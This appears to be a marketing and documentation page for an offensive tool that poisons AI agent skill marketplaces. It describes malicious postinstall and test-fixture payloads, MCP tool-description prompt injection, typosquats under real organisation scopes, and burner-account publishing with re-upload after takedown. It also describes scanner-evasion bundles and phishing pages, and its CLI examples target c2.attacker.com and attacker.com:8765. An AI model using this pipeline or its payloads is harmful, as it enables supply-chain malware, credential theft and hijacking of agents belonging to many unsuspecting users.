NIGHTFALL Tool 95 — WMD-Class — OPEN / INJECT / UNLEASHED

SPECTER BAZAAR

AI Agent App Store & Skill Marketplace Attack Engine — Weaponises the skill supply chain across ClawHub, Smithery, OpenTools, MCP.run, and Glama. ClawHavoc-class distribution poisoning. 135,000+ exposed agents.

325Tests
5Marketplaces
4CVEs
99.5%BadSkill ASR
OPEN/INJECT/
UNLEASHEDGate
View Documentation All 95 Tools
Attack Surface

Five AI Skill Marketplaces

135,000+ AI agents exposed across the public skill marketplace ecosystem. Each platform is an active supply chain attack surface.

ClawHub
Primary target — CVE-2026-25253 WebSocket hijack, CVE-2026-32922 OAuth scope escalation
Smithery
dockerBuildPath path traversal — arbitrary file read from build container
OpenTools
Cross-platform repackaging — clawhub_skill_md / npm_package_json dual format
MCP.run
MCP tool description line-jumping — Trail of Bits prompt injection surface
Glama
Namespace squatting and shadow skill registration — combosquat + scope injection
Marketplace CVEs

Four Weaponised Vulnerabilities

Marketplace infrastructure vulnerabilities that enable unauthenticated agent hijack, OAuth privilege escalation, and auth bypass at CVSS 8.8–9.9.

CVE-2026-25253
OpenClaw WebSocket Hijack
openclaw:// URI scheme triggers unauthenticated WebSocket connection to attacker-controlled server. Skill.md with crafted link redirects victim agent's tool calls. Unpatched in OpenClaw < 2026.1.25.
CVSS 8.8
CVE-2026-32922
ClawHub OAuth Scope Escalation
Token confusion between pairing endpoint and admin API allows initial user-scope token to escalate to admin privileges. Full marketplace account takeover via single request.
CVSS 9.9
CVE-2026-44338
PraisonAI Auth Bypass
Unauthenticated access to PraisonAI admin API endpoints. No authentication required for agent configuration read/write, tool registration, and credential exposure.
CVSS 9.1
CVE-2026-26319
Telnyx Webhook HMAC Forgery
Telnyx webhook signature verification bypass. Allows injection of forged events into Telnyx-integrated AI agent workflows — arbitrary tool invocation without valid API credentials.
CVSS 8.1
Architecture

8 Subsystems

Full supply chain attack pipeline — from marketplace reconnaissance through weaponised skill distribution and infrastructure exploitation.

01 · RECON
Marketplace Enumeration
Enumerates ClawHub, Smithery, OpenTools, MCP.run, Glama via HTTP scraping and API calls. Builds NetworkX DiGraph of publisher relationships. Detects namespace ownership gaps, coordinated publishing patterns, and version velocity anomalies. Returns SkillProfile objects for downstream targeting.
OPEN Gate
02 · HARVEST
Skill Intelligence Collection
Scrapes skill manifests, package.json, and skill.yaml. Extracts declared capabilities vs actual permissions. BadSkill ASR scoring per arXiv:2604.09378 — identifies which existing skills could be trojanised with highest success probability. Publisher age, download trends, cross-platform name squatting detection.
OPEN Gate
03 · FORGE
Weaponised Skill Creation
8 payload templates: npm_postinstall_bash (C2 beacon on npm install), clawhub_skill_md (laundered skill.yaml with hidden postinstall), mcp_tool_poison (tool description line-jumping injection), rug_pull_state_machine (benign→malicious after N downloads), skill_trojan_shamir (Shamir secret-sharing split payload arXiv:2604.06811), test_file_payload (conftest.py autouse fixture), symlink_trap, png_injection. CVE-2026-25253 openclaw:// link embedded in SKILL.md.
INJECT Gate
04 · LURE
Social Engineering & Typosquatting
Typosquat generator: keyboard substitution, transposition, homoglyph, combosquat, scope injection (e.g., @anthropic/filesystem-tool). README cloner with attacker branding. Understatement metadata — declares 2 permissions, actually uses 14. Aged commit history fabrication. SEO landing page with schema.org markup for search engine visibility.
INJECT Gate
05 · PUBLISH
Automated Skill Distribution
BurnerAccountPool with quarantine management across npm, ClawHub, Smithery, OpenTools, Glama. OTP TOTP secret bypass. Takedown watch + automatic reupload with variant rotation. Blitz mode: bulk publish across credential pool at configurable rate. INJECT gate for dry-run validation. UNLEASHED gate required for live marketplace publication.
INJECT Gate (dry-run) UNLEASHED Gate (live)
06 · HIJACK
CVE Exploitation Engine
MarketplaceHijack: CVE-2026-25253 openclaw:// WebSocket session hijack (CVSS 8.8), CVE-2026-32922 OAuth scope escalation to admin (CVSS 9.9), CVE-2026-44338 PraisonAI unauthenticated admin access (CVSS 9.1), Smithery dockerBuildPath path traversal for arbitrary container file read, CVE-2026-26319 Telnyx webhook HMAC forgery, SSRF gateway probe targeting cloud metadata at 169.254.169.254. PoC mode requires no live target.
INJECT Gate
07 · ECHO
Distribution Channel Poisoning
DistributionChannelPoisoner: resolution chain TOCTOU window mapping, postinstall hook variants (npm/clawhub/conftest/cargo), shadow typosquat opportunity finder, mirror writability probe, rug-pull download-counter state machine, laundered skill.md with risk_tier:low frontmatter, scanner bypass bundle (Snyk/Cisco Umbrella/VirusTotal evasion via symlink/PNG steganography/conftest obfuscation), phishing page generator for ClawHub and Smithery impersonation.
INJECT Gate
08 · REPORT
Signed Evidence Report
Ed25519-signed BZR-{hex12} reports. Blast radius calculation: install_count × payload class severity. OWASP Agentic Skills Top 10 AST01–AST10 mapping. MITRE ATLAS AML.T0018/T0020/T0051/T0054 technique annotation. Risk score 0.0–1.0. Hash-chained evidence log. JSON/Markdown/text output.
All Gates
CLI Reference

specter-bazaar

All modes. Full pipeline or per-subsystem targeting.

# RECON — enumerate marketplaces (no key required)
$ specter-bazaar scan clawhub --limit 100

# HARVEST — scrape and score skill manifests
$ specter-bazaar harvest clawhub --mode local --out-dir ./skills

# FORGE — create weaponised skill (INJECT gate)
$ specter-bazaar forge \
    --template clawhub_skill_md \
    --skill-name google-workspace-sync \
    --c2-domain c2.attacker.com \
    --override --key ~/.nightfall/nightfall.key

# LURE — generate typosquats and laundered metadata
$ specter-bazaar lure --skill filesystem-tool \
    --scope-orgs anthropic openai \
    --c2-domain c2.attacker.com \
    --key ~/.nightfall/nightfall.key

# HIJACK — exploit marketplace CVE (INJECT gate)
$ specter-bazaar hijack --cve CVE-2026-25253 \
    --target http://localhost:39281 \
    --attacker-ws attacker.com:8765 \
    --key ~/.nightfall/nightfall.key

# PUBLISH — live publication (UNLEASHED gate — real API calls)
$ specter-bazaar publish ./my-skill-dir \
    --marketplace npm \
    --npm-token $NPM_TOKEN \
    --override --i-understand-this-is-live-publication \
    --key ~/.nightfall/nightfall.key

# FULL ASSESSMENT — all 8 subsystems
$ specter-bazaar full \
    --marketplace clawhub \
    --c2-domain c2.attacker.com \
    --gate UNLEASHED --key ~/.nightfall/nightfall.key \
    --output markdown --out-dir ./reports
Framework Coverage

MITRE ATLAS & OWASP

AML.T0018
Backdoor ML Model — SkillTrojan payload activation
AML.T0020
Poison Training Data — poisoned skill manifest injection
AML.T0051
LLM Prompt Injection — MCP tool description line-jumping
AML.T0054
Prompt Injection — openclaw:// URI-triggered WebSocket hijack
T1195.001
Supply Chain Compromise: Develop Malware
T1072
Software Deployment Tools (skill postinstall hook abuse)
OWASP Agentic Skills Top 10
AST01
Malicious Skill Publication — laundered metadata, hidden payloads
AST02
Typosquatting & Name Confusion — keyboard/homoglyph/combosquat variants
AST03
Postinstall Hook Abuse — npm/clawhub/cargo/conftest variants
AST04
Rug Pull — benign→malicious state machine after download threshold
AST05
Dependency Confusion — namespace injection into org-scoped registries
AST06
Mirror Poisoning — writable mirror injection for distribution
AST07
Scanner Evasion — Snyk/Cisco/VirusTotal bypass bundles
AST08
Credential Theft via Skill — API key harvest postinstall
AST09
Marketplace Infrastructure Exploit — CVE-2026-25253/32922/44338/26319
AST10
Phishing via Skill Lure — impersonation landing pages